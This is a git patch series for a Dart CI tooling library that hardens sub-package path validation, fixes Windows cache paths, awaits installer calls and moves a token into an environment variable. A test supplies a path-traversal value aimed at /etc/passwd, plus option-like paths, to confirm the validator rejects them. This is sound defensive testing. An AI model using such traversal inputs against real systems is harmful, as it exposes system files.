await CiProcessRunner.exec('sh', [ '-c', 'type -p curl >/dev/null || sudo apt install curl -y && ' 'curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | ' @@ -79,32 +79,32 @@ abstract final class ToolInstallers { ]); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { - CiProcessRunner.exec('winget', ['install', 'GitHub.cli']); + await CiProcessRunner.exec('winget', ['install', 'GitHub.cli']); } else if (CiProcessRunner.commandExists('choco')) { - CiProcessRunner.exec('choco', ['install', 'gh', '-y']); + await CiProcessRunner.exec('choco', ['install', 'gh', '-y']); } } } static Future installJq() async { if (Platform.isMacOS) { - CiProcessRunner.exec('brew', ['install', 'jq']); + await CiProcessRunner.exec('brew', ['install', 'jq']); } else if (Platform.isLinux) { - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'jq']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'jq']); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { - CiProcessRunner.exec('winget', ['install', 'jqlang.jq']); + await CiProcessRunner.exec('winget', ['install', 'jqlang.jq']); } else if (CiProcessRunner.commandExists('choco')) { - CiProcessRunner.exec('choco', ['install', 'jq', '-y']); + await CiProcessRunner.exec('choco', ['install', 'jq', '-y']); } } } static Future installTree() async { if (Platform.isMacOS) { - CiProcessRunner.exec('brew', ['install', 'tree']); + await CiProcessRunner.exec('brew', ['install', 'tree']); } else if (Platform.isLinux) { - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'tree']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { Logger.info('tree is built-in on Windows (limited). For full tree: choco install tree'); } diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 583881a..18195f8 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -94,6 +94,39 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); + /// Validates a single sub-package entry. Returns null if valid, otherwise error message. + /// Mutates [seenNames] and [seenPaths] only when valid. Used by [SubPackageUtils.loadSubPackages]. + static String? validateSubPackageEntry(Map sp, Set seenNames, Set seenPaths) { + final name = sp['name']; + final pathValue = sp['path']; + + if (name is! String || name.trim().isEmpty) return 'name must be a non-empty string'; + if (name != name.trim()) return 'name must not have leading/trailing whitespace'; + if (!_isSafeSubPackageName(name)) return 'name contains unsupported characters: "$name"'; + + if (pathValue is! String || pathValue.trim().isEmpty) return 'path must be a non-empty string'; + if (pathValue != pathValue.trim()) return 'path must not have leading/trailing whitespace'; + if (pathValue.contains(RegExp(r'[\r\n\t]'))) return 'path must not contain newlines/tabs'; + if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { + return 'path must be a relative repo path'; + } + if (pathValue.contains('\\')) return 'path must use forward slashes (/)'; + final normalized = p.posix.normalize(pathValue); + if (normalized.startsWith('..') || normalized.contains('/../')) { + return 'path must not traverse outside the repo'; + } + if (normalized == '.') return 'path must not be repo root (".")'; + if (normalized.startsWith('-')) { + return 'path must not start with "-" (reserved for CLI options)'; + } + if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { + return 'path contains unsupported characters: "$pathValue"'; + } + if (!seenNames.add(name)) return 'duplicate name "$name"'; + if (!seenPaths.add(normalized)) return 'duplicate path "$normalized"'; + return null; + } + /// Returns the web_test config map if present and valid; otherwise null. static Map? _getWebTestConfig(Map ciConfig) { final raw = ciConfig['web_test']; diff --git a/templates/github/workflows/issue-triage.template.yaml b/templates/github/workflows/issue-triage.template.yaml index f632fc7..770bd69 100644 --- a/templates/github/workflows/issue-triage.template.yaml +++ b/templates/github/workflows/issue-triage.template.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -80,6 +80,7 @@ jobs: node-version: "22" - run: npm install -g @google/gemini-cli@latest + if: steps.trigger.outputs.run == 'true' - name: Cache Go modules (GitHub MCP server) if: steps.trigger.outputs.run == 'true' diff --git a/templates/github/workflows/release.template.yaml b/templates/github/workflows/release.template.yaml index c13875b..78511ad 100644 --- a/templates/github/workflows/release.template.yaml +++ b/templates/github/workflows/release.template.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index cf7d915..79047f6 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -1,10 +1,13 @@ +import 'dart:convert'; import 'dart:io'; import 'package:path/path.dart' as p; import 'package:test/test.dart' hide TestFailure; +import 'package:runtime_ci_tooling/src/cli/utils/process_runner.dart'; import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/step_summary.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/sub_package_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; bool _canCreateSymlink() { @@ -43,7 +46,10 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {}, + ); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -67,8 +73,10 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => - RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), throwsA(isA()), ); }); @@ -77,7 +85,10 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), throwsA(isA()), ); }); @@ -126,19 +137,35 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { - final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); - }); - - test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { - final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); - }); + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -186,16 +213,21 @@ void main() { expect(results.failures, isEmpty); }); - test('returns unparsed results when file has valid JSON but no structured events', () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); + test( + 'returns unparsed results when file has valid JSON but no structured events', + () { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File( + jsonPath, + ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); test('parses pass/fail/skipped counts and failure details', () { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -307,7 +339,12 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { final results = TestResults() ..parsed = true ..passed = passed @@ -317,39 +354,50 @@ void main() { return results; } - test('emits NOTE when parsed results are successful and exit code is 0', () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); - - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }); - - test('emits CAUTION when exit code is non-zero even if failed count is zero', () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); - }); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -364,7 +412,12 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -380,14 +433,25 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), ); TestResultsUtil.writeTestJobSummary( @@ -427,7 +491,12 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); + expect( + summary!, + contains( + '_...and 5 more failures. See test logs artifact for full details._', + ), + ); expect(summary!, isNot(contains('failing test 24'))); }); @@ -500,7 +569,10 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + StepSummary.write( + '語', + environment: {'GITHUB_STEP_SUMMARY': summaryPath}, + ); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -522,4 +594,157 @@ void main() { expect(out, contains('')); }); }); + + group('SubPackageUtils.loadSubPackages', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('sub_pkg_load_'); + }); + + tearDown(() { + if (tempDir.existsSync()) tempDir.deleteSync(recursive: true); + }); + + void _writeConfig(Map ci) { + final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'ci': ci})); + } + + test('returns empty when no sub_packages', () { + _writeConfig({'dart_sdk': '3.9.2', 'features': {}}); + expect(SubPackageUtils.loadSubPackages(tempDir.path), isEmpty); + }); + + test('valid sub-packages pass through', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'core', 'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result.length, equals(2)); + expect(result[0]['name'], equals('core')); + expect(result[0]['path'], equals('packages/core')); + expect(result[1]['name'], equals('api')); + expect(result[1]['path'], equals('packages/api')); + }); + + test('skips invalid name (unsupported chars)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo bar', 'path': 'packages/foo'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (traversal)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'evil', 'path': '../../../etc/passwd'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (absolute)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo', 'path': '/usr/local'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (leading dash)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo', 'path': '--help'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('valid entries pass when mixed with invalid', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'bad', 'path': '../../../etc'}, + {'name': 'good', 'path': 'packages/good'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result.length, equals(1)); + expect(result[0]['name'], equals('good')); + expect(result[0]['path'], equals('packages/good')); + }); + }); + + group('CiProcessRunner.exec', () { + test('fatal path exits with process exit code after flushing stdout/stderr', + () async { + final scriptPath = p.join( + p.current, + 'test', + 'scripts', + 'fatal_exit_probe.dart', + ); + final result = Process.runSync( + Platform.resolvedExecutable, + ['run', scriptPath], + runInShell: false, + ); + final expectedCode = Platform.isWindows ? 7 : 1; + expect(result.exitCode, equals(expectedCode), + reason: 'fatal exec should exit with failing command exit code'); + }); + }); + + group('CiProcessRunner.runWithTimeout', () { + test('completes normally when process finishes within timeout', () async { + final result = await CiProcessRunner.runWithTimeout( + Platform.resolvedExecutable, + ['--version'], + timeout: const Duration(seconds: 10), + ); + expect(result.exitCode, equals(0)); + expect(result.stdout, contains('Dart')); + }); + + test( + 'returns timeout result and kills process when timeout exceeded', + () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }, + ); + }); } diff --git a/test/scripts/fatal_exit_probe.dart b/test/scripts/fatal_exit_probe.dart new file mode 100644 index 0000000..ff9a9b0 --- /dev/null +++ b/test/scripts/fatal_exit_probe.dart @@ -0,0 +1,14 @@ +// Probe script for testing CiProcessRunner.exec with fatal=true. +// Run: dart run test/scripts/fatal_exit_probe.dart +// Expected: exits with code 1 (or 7 on Windows when using exit 7). +import 'dart:io'; + +import 'package:runtime_ci_tooling/src/cli/utils/process_runner.dart'; + +Future main() async { + if (Platform.isWindows) { + await CiProcessRunner.exec('cmd', ['/c', 'exit', '7'], fatal: true); + } else { + await CiProcessRunner.exec('false', [], fatal: true); + } +} From 261466cf443e8dcd69c5743072ccfc3eb96e6cfd Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:17:08 -0500 Subject: [PATCH 13/16] fix: standardize Windows pub-cache paths, make artifact retention configurable, update docs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Fix Windows pub-cache path in ci.skeleton.yaml: forward slashes → backslashes to match release/triage templates and Dart's default %LOCALAPPDATA%\Pub\Cache - Make artifact_retention_days configurable via ci config (1-90, default 7) with full validation matching line_length pattern - Extract Utf8BoundedBuffer utility for testable byte-bounded stream capture - Extract _resolveLogDirOrExit to eliminate late-final fragility - Update API_REFERENCE.md with all new public APIs (TestResultsUtil, TestResults, TestFailure, RepoUtils methods, Utf8BoundedBuffer, exitWithCode) - Document artifact retention policy in SETUP.md Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 26 +- .runtime_ci/config.json | 4 +- .runtime_ci/template_versions.json | 20 +- SETUP.md | 4 + USAGE.md | 5 +- docs/cli/API_REFERENCE.md | 23 +- lib/src/cli/commands/init_command.dart | 3 + lib/src/cli/commands/test_command.dart | 172 ++++------ lib/src/cli/commands/update_command.dart | 2 +- lib/src/cli/utils/repo_utils.dart | 3 + lib/src/cli/utils/step_summary.dart | 46 ++- lib/src/cli/utils/test_results_util.dart | 23 +- lib/src/cli/utils/utf8_bounded_buffer.dart | 87 ++++++ lib/src/cli/utils/workflow_generator.dart | 38 ++- templates/config.json | 2 + templates/github/workflows/ci.skeleton.yaml | 56 ++-- test/cli_utils_test.dart | 327 +++++++++----------- test/workflow_generator_test.dart | 102 ++++++ 18 files changed, 571 insertions(+), 372 deletions(-) create mode 100644 lib/src/cli/utils/utf8_bounded_buffer.dart diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index debb562..48110fa 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -93,13 +93,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -155,13 +156,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 diff --git a/.runtime_ci/config.json b/.runtime_ci/config.json index 2251e38..ef03610 100644 --- a/.runtime_ci/config.json +++ b/.runtime_ci/config.json @@ -66,6 +66,7 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, + "artifact_retention_days": 7, "personal_access_token_secret": "TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN", "features": { "proto": false, @@ -74,7 +75,8 @@ "analysis_cache": false, "managed_analyze": false, "managed_test": true, - "build_runner": true + "build_runner": true, + "web_test": false }, "secrets": {}, "sub_packages": [], diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 2e01001..544a498 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T02:11:44.094948Z", + "updated_at": "2026-02-25T03:15:47.792987Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "f14e900c3eb2c8ee9472627688881d197b37fb801bea00fffd42fef5a1947081", - "consumer_hash": "b6b79735284de22017f27b042964dc4f51295f36752d2a340c200a27fd1e6465", - "updated_at": "2026-02-25T02:11:44.092566Z" + "hash": "387908c7364598e498743b3b34bf3784f73b9ff424518198d7fd550b5d42321b", + "consumer_hash": "6b674b7d72bd68a902fa2215f335fc89ef1c520d8edb81539d69ffb80acded23", + "updated_at": "2026-02-25T03:15:47.794152Z" }, "workflow_release": { - "hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", - "consumer_hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", - "updated_at": "2026-02-25T02:11:44.094396Z" + "hash": "dae21f893768272b85bae853c4b6d5013c6641762cf1536ea5fcce5123a0314c", + "consumer_hash": "dae21f893768272b85bae853c4b6d5013c6641762cf1536ea5fcce5123a0314c", + "updated_at": "2026-02-25T03:13:46.486887Z" }, "workflow_issue_triage": { - "hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", - "consumer_hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", - "updated_at": "2026-02-25T02:11:44.094960Z" + "hash": "229416f8f4e0a0ed87d655c2f280b616318665fa89a9aaa177de2a9ce0ccaed8", + "consumer_hash": "229416f8f4e0a0ed87d655c2f280b616318665fa89a9aaa177de2a9ce0ccaed8", + "updated_at": "2026-02-25T03:13:46.487715Z" } } } diff --git a/SETUP.md b/SETUP.md index 963d153..959a745 100644 --- a/SETUP.md +++ b/SETUP.md @@ -306,6 +306,7 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `dart_sdk` | string | **required** | Dart SDK version (e.g. `"3.9.2"`) | | `personal_access_token_secret` | string | `"GITHUB_TOKEN"` | GitHub secret name for PAT | | `line_length` | int/string | `120` | Line length for `dart format` checks (also controls the git pre-commit hook) | +| `artifact_retention_days` | int/string | `7` | Retention window for uploaded CI test artifacts (1-90 days) | | `features.proto` | bool | `false` | Enable protobuf generation step | | `features.lfs` | bool | `false` | Enable Git LFS checkout | | `features.format_check` | bool | `true` | Enable `dart format` check | @@ -332,6 +333,9 @@ When `features.web_test` is `true`, the `web_test` object is optional; if omitte Cross-validation rule: - If `features.web_test` is `false`, omit `web_test` or set it to `{}`. Non-empty `web_test` config with the feature disabled is treated as dead config and fails validation. +Artifact retention policy: +- CI test artifacts (logs, test-results, fixtures) default to **7 days** retention and can be overridden via `ci.artifact_retention_days` (1-90). + You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), diff --git a/USAGE.md b/USAGE.md index e054296..d6d85b2 100644 --- a/USAGE.md +++ b/USAGE.md @@ -141,7 +141,7 @@ dart run runtime_ci_tooling:manage_cicd init 4. Creates `.runtime_ci/config.json` with detected values (skipped if already present) 5. Creates `.runtime_ci/autodoc.json` from `lib/src/` directory structure (skipped if already present) 